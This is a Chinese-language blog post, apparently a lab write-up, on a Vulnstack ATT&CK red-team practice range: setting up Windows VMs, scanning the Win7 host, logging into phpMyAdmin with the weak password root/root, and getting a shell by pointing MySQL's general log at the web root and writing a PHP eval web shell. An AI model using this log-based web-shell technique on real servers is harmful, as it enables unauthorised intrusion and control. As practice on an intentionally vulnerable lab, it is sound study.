靶機練習 - ATT&CK紅隊實戰靶場 - 1. 環境搭建和漏洞利用

Sally_Zhang發表於2020-08-11

最近某個公眾號介紹了網上的一套環境,這個環境是多個Windows靶機組成的,涉及到內網滲透,正好Windows和內網滲透一直沒怎麼接觸過,所以拿來學習下。

下載地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/2/

 

環境配置和檢查

加上kali一共四臺虛擬機器。

win7 x64

需要配置兩張網路卡,一個在內網網段,一個在外網網段,配置如下(VM預設只有一張網路卡,自己新增一個網路介面卡就好了),內網網路配置為特定虛擬網路:

 

兩臺內網伺服器,網路配置如下:

kali虛擬機器應只能連到外網,也就是和win7的外網網路卡在同一網段,但無法訪問內網網段,網路配置如下:

啟動win7虛擬機器C盤下的phpstudy:

最後內網的三臺虛擬機器互相ping一下,保證能ping通。

 

資訊收集

 kali掃一下ip,win7外網網址為:192.168.174.135:

對win7進行埠掃描:

 

 80埠是一個網站,發現網站底部有一個MySQL資料庫連線檢測:

嘗試輸入使用者名稱和密碼root/root,連上了。。。就。。。挺突然的。。。

再對網站進行掃描,發現phpinifo.php和phpmyadmin頁面:

 

漏洞利用

第一步資訊收集找到了php後臺管理頁面以及mysql的root密碼,接下來嘗試利用這個漏洞getshell從而控制釋出網站的這臺主機。

訪問http://192.168.174.135/phpmyadmin/,並用弱密碼root/root登入,利用方式有兩種:

1. 利用into outfile直接寫入shell檔案

show variables like '%secure%'

 很遺憾secure_file_priv的值是NULL,也就是不允許匯入匯出,如果嘗試寫入shell檔案會失敗:

2.利用日誌getshell

開啟mysql日誌功能:

show global variables like '%general%'

set global general_log='ON'

將日誌檔案的存放位置修改為當前網站的根目錄:

set global  general_log_file = 'C:/phpStudy/WWW/shell.php'

執行語句:

SELECT '<?php @eval($_POST["cmd"]); ?>'

用蟻劍連線:

 

當前域名為god,登入使用者是admin:

 

 

 

相關文章